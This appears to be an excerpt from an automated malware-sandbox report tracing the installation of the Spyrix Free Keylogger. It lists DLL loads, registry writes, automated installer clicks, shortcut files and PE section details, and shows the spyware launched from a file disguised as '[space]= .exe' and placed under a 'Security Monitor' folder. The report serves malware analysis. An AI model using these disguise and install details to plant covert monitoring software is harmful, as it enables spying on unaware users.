Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: olepro32.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: windows.globalization.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: globinputhost.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\reg.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: Spyrix Free Keylogger.lnk.22.dr LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
Source: Uninstall Spyrix Free Keylogger.lnk.22.dr LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe
Source: Spyrix Free Keylogger.lnk0.22.dr LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
Source: Gmail.lnk.69.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.69.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.69.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.69.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.69.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.69.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File written: C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Window found: window name: TSelectLanguageForm
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Automated click: I accept the agreement
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Automated click: Next >
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: [space]= .exe.6.dr Static PE information: 0xFC3E2D57 [Fri Feb 8 17:01:11 2104 UTC]
Source: is-9U2JI.tmp.22.dr Static PE information: section name:
Source: is-9U2JI.tmp.22.dr Static PE information: section name:
Source: is-9U2JI.tmp.22.dr Static PE information: section name:
Source: is-9U2JI.tmp.22.dr Static PE information: section name:
Source: is-9U2JI.tmp.22.dr Static PE information: section name:
Source: is-9U2JI.tmp.22.dr Static PE information: section name:
Source: is-9U2JI.tmp.22.dr Static PE information: section name:
Source: is-9U2JI.tmp.22.dr Static PE information: section name:
Source: is-9U2JI.tmp.22.dr Static PE information: section name:
Source: is-9U2JI.tmp.22.dr Static PE information: section name:
Source: is-9U2JI.tmp.22.dr Static PE information: section name: .d
Source: is-9U2JI.tmp.22.dr Static PE information: section name: .adata
Source: is-67IFD.tmp.22.dr Static PE information: section name: .rodata
Source: is-67IFD.tmp.22.dr Static PE information: section name: .rotext
Source: is-719F1.tmp.22.dr Static PE information: section name:
Source: is-719F1.tmp.22.dr Static PE information: section name:
Source: is-719F1.tmp.22.dr Static PE information: section name:
Source: is-719F1.tmp.22.dr Static PE information: section name:
Source: is-719F1.tmp.22.dr Static PE information: section name:
Source: is-719F1.tmp.22.dr Static PE information: section name:
Source: is-719F1.tmp.22.dr Static PE information: section name:
Source: is-719F1.tmp.22.dr Static PE information: section name:
Source: is-719F1.tmp.22.dr Static PE information: section name:
Source: is-719F1.tmp.22.dr Static PE information: section name:
Source: is-719F1.tmp.22.dr Static PE information: section name: .adata
Source: is-EO3DV.tmp.22.dr Static PE information: section name: .didata
Source: is-1I5NJ.tmp.22.dr Static PE information: section name: /4
Source: is-1I5NJ.tmp.22.dr Static PE information: section name: /19
Source: is-1I5NJ.tmp.22.dr Static PE information: section name: /31
Source: is-1I5NJ.tmp.22.dr Static PE information: section name: /45
Source: is-1I5NJ.tmp.22.dr Static PE information: section name: /57
Source: is-1I5NJ.tmp.22.dr Static PE information: section name: /70
Source: is-1I5NJ.tmp.22.dr Static PE information: section name: /81
Source: is-1I5NJ.tmp.22.dr Static PE information: section name: /92
Source: ffws.exe.56.dr Static PE information: section name: .rodata
Source: ffws.exe.56.dr Static PE information: section name: .rotext
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_08EBFDB8 push esp; retf 7_2_08EBFDB9
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_008650DC push 00865161h; ret 56_2_00865159
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_00865B30 push 00865BB6h; ret 56_2_00865BAE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0086DEA3 push cs; ret 56_2_0086DEB4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_008660D4 push 0086613Ch; ret 56_2_00866134
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0086D2D4 push cs; iretd 56_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_00872002 push 00000075h; retf 56_2_00872004
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_00874401 push ecx; ret 56_2_00874402
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_00869C0D push eax; ret 56_2_00869C8D
